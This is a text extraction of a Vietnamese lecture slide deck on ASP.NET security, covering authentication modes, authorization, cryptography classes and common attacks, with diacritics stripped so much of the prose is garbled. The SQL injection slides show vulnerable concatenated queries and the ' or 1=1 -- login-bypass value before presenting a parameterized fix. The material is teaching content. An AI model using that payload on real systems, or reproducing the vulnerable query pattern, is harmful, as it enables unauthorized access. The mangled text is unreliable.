ptuddb2-04-bao mat trong asp.net

8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net

1/55

Bo mt trong ASP.NET

23 January 2003

Lng V Minh

Source: ASP.NET: .NET Security Guidance Architecture Guide


2/55

Ni dung

Vn bo mt trong ng dng Web Web.config

Vn chng thc quyn truy cp

Vn chng thc quyn s dng

Cc bc thc hin kim tra bo mt

Mt s kiu tn cng

Th vin bo mt ca .NET

2


3/55

VN BO MT TRONG WEB

3


4/55

Cc vn lin quan n bo mt ng dng Web

Bo mt da trn phn cng

Bo mt da trn cng truy cp (Firewall, DoS)

Bo mt da trn giao thc an ton (SSL, TSL, HTTPS)

Bo mt trn Webserver IIS

Bo mt trn tng ng dng ASP.NET

Bo mt CSDL SQL

Bo mt cp H iu hnh

4


5/55

Tp tin cu hnh Web.config

Mt phn cu hnh v bo mt:


6/55

CHNG THC QUYN TRUY CP

Authentication

6


7/55




8/55


iu khin tt c vn bo mt trong Website

Mi Website c duy nht mt Webconfig th mc gc

Tuy nhin, c th c thm cc file khc trong th mc con


9/55

Vn chng thc ngi dng (Authentication)

Tr li cho cu hi: Who you are ?

Cc c ch chng thc ngi dng trong ASP.NET

Windows Based

Form Based

Passport None

9


10/55

Authentication Windows Based

Ph hp cho h thng Web cc b (intranet)

Khng cn thng bo xc thc Phi s dng ti khon Windows Domain

Phi kch hot Cookie trnh duyt

Bao gm cc c ch:

Basic Authentication (Base64 encoded password)

Digest Authentication (Encrypted password - IE)

Integrated Authentication (kerberos)

10


11/55

Authentication Form Based

Thng s dng cho cc website Thng mi

C giao din ng nhp h thng Ph hp vi vic phn quyn khc nhau

C th khng cn phi s dng Cookies (Cookies-less)

11


12/55

Authentication Form Based

12


13/55

Mt s vn lin quan n Cookie-less

SessionIDc truyn trn Query String

Web.Config

Session ko di trong 20 pht (mc nh) k t thao tccui cng ca ngi dng

Tn cng da trn Session

public terminal

Sniffer

13


14/55


15/55

AuthenticationNone

S dng quyn truy cn Anonymous n Webserver

Qun l bo mt thng qua ISAPI

S dng ti khon IUSER_machinename ca Windows

15


16/55

CHNG THC QUYN S DNG

Authorization

16


17/55




18/55

Vn chng thc quyn s dng (Authorization)

Tr li cho cu hi: What they can see and do?

Xc thc quyn truy cp th mc, tp tin ca ngi dng

C ch h tr ca ASP.NET

Membership

Role-based Security

18


19/55


Tr li cho cu hi: What they can see and do?

Xc thc quyn truy cp th mc, tp tin ca ngi dng

C ch h tr ca ASP.NET

Membership

Role-based Security

Verb-based : GET, POST, HEAD (da vo giao thc HTTP)

Anonymous users (? Users)

Authenticated users (* Users)

19


20/55


? = Anonymous users

* = Everyone

20


21/55

Bo mt cho trang web

Thm th vo web.config

21


22/55

Bo mt cho th mc web

To mt file Web.config mi cho th mc cn bo mt

Ch cn cha thng tin sau:

22


23/55

CC BC THC HIN

23


24/55

Bc 1 - Authentication = Window

To v cp nht Web.config

To ti khon v nhm ti H iu hnh Windows Bt u s dng

24


25/55

Bc 1 - Authentication = Form

To v cp nht Web.config

To 1 trang web login

Chn ni lu tr ti khon ngi dng

Web.config

Tp tin XML, Text CSDL

Webservice

25


26/55


Mt login form bao gm:

Textbox: username

Textbox: password

Checkbox: Remember me (optional)

Button: Login

Vn i vi mt khu:

Chiu di ti thiu, phn bit Hoa Thng, k t l

Dictionary Attack

M ha mt khu (Hash function)

26


27/55


Mt s hm lin quan:

FormsAuthentication.Authenticate(

string username,

stringpassword);

FormsAuthentication.RedirectFromLoginPage(

string AuthName,

bool Persistent);

Response.Redirect(string Url);

27


28/55

28


29/55

Bc 2

Ly thng tin nh danh ngi dng

User Identity

Ly thng tin xc thc quyn s dng

IsInRole (Windows mode only)

Personalization

Lu tr cc thng tin cn thit trong Session

Namespace: System.Web.Security

29


30/55

Bc 2

Sau khi xc thc ngi dng thnh cng, mt ngi dng cth l mt trong cc kiu sau:

GenericIdentity

AuthenticationType, Name, IsAuthenticated

FormsIdentity


Ticket

PassportIdentity


HasTicket, TicketAge, Item, TimeSinceSignIn

WindowsIdentity


IsAnonymous, IsGuest, IsSystem, Token, Impersonate

30


31/55

Mt s hm lin quan

Using System.Web.Security;

String User.Identity.Name;

Bool User.Identity.IsAuthenticated;

Bool User.IsInRole(string role);

FormsAuthentication.SignOut();

31


32/55

MT S KIU TN CNG

32


33/55

Tn cng SQL Injection

Da vo cch thc hot ng ca Webpage

S dng ngun d liu nhp vo t:

Textbox

QueryString

S dng k thut chn cc m c sql vo lnh SQL

Chc nng tm kim

Chc nng phn trang

Chc nng xc thc ngi dng

33


34/55


34

string sql = "select * from KB where

content like '" + search.Text + "'

string sql = "select * from KB where

content like '%'


35/55


35

string sql = "select * from Users where

user ='" + User.Text + "'

and pwd='" + Password.Text + "'"

string sql = "select * from Users where

user =' ' or 1=1 --' and pwd=''"


36/55


37/55


Gii php:

Khng s dng quyn sa Chui kt ni (connection string) : lu c m ha

S dng Store-procedured thc hin truy vn d liu

S dng tham s (i tng Parameter) trong lnh SQL

37

sql = "select * from Users where

user = @user and pwd = @pwd";

SqlCommand cmd = new SqlCommand(sql,con);

cmd.Parameters.Add("@user",User.Text);cmd.Parameters.Add("@pwd",Password.Text);


38/55

Tn cng Cross site-scripting

Li dng vic hin th d liu t Database (c ngi

dng nhp vo) Chn m c HTML / Javascript vo ni dung d liu

Gii php: S dng Validation controls

S dng regexp

Kim tra chiu di d liu nhp vo

S dng Server.HtmlEncode/Server.HtmlDecode

38


39/55

Tn cng HTTP Harvesting

Khai thc d liu lu tr trn Database d vo :

Textbox, Querystring, Cookie

S dng cc lnh SQL

S dng tham s phn trang

Detail.aspx?id=1

Gii php:

M ha QueryString S dng System.Drawing

Theo di qu trnh khai thc web ca ngi dng

Thu i tc

39


40/55

TH VIN BO MT CA .NET

System.Security.Cryptogaphy

40


41/55

Th vin bo mt trong .NET

M ha (Encryption)

Nghi thc SSL (Secure Sockets Layer)

Ch k in t

41


42/55

M ha

M ha Encryption

Chuyn d liu sang dng th hin khc

Thut ton

Kha

C 3 k thut

Hash M ha khng i xng (public key)

M ha i xng (secret key)

42

M h H h


43/55

M ha - Hash

S dng thut ton Hash a ra mt con s t mtthng ip c di bt k

Xung t gi tr bm rt him xy ra

Khng s dng kha

Chui c m ha khng th gii m thnh chui ban u

Thut ton MD5, SHA-1, SHA256, SHA512,

43

M h H h


44/55

M ha Hash

MD5CryptoServiceProvider

SHA1CryptoServiceProvider, SHA1Managed



44

M h i


45/55

M ha i xng

M ha ch s dng 1 loi kha

Secret keym ha v gii m thng ip

Thut ton 3DES, Rijndael (AES), blowfish, idea,

45

M h i


46/55

M ha i xng

AesCryptoServiceProvider

AesManaged

DESCryptoServiceProvider

RC2CryptoServiceProvider

RijndaelManaged

TripleDESCryptoServiceProvider

46

M h bt i


47/55

M ha bt i xng

M ha da vo 2 loi kha

Public keym ha thng ip Private keygii m thng ip

Thut ton RSA, DSA,

47

M h bt i


48/55

M ha bt i xng

Cc lp i tng

DSACryptoServiceProvider RSACryptoServiceProvider

ECDiffieHellmanCng

ECDsaCng

48

N hi th SSL


49/55

Nghi thc SSL

SSL Socket Secure

Layer Nghi thc bo mt kt

ni gia client vserver

49

N hi th SSL


50/55

Nghi thc SSL

50

SSL Socket Secure

Layer Nghi thc bo mt kt

ni gia client vserver

Ch k i t


51/55

Ch k in t

51

Ch k in t


52/55

Ch k in t

52

Tip bo mt


53/55

Tip bo mt

Khng tin tng iu g100 %

c lng ri ro

Ri ro b tn cng

Hu qu

Hun luyn nhn vin

Architects, Developer, User,Administrator

Xem xt li:

M ngun, GUI

Microsoft BaselineSecurity Analyzer 1.2

Scan network or local

Scan installed updates

Scan well-knownissues


54/55

54

http://www.securitystats.com/tools/password.php


55/55

ptuddb2-04-bao mat trong asp.net

Documents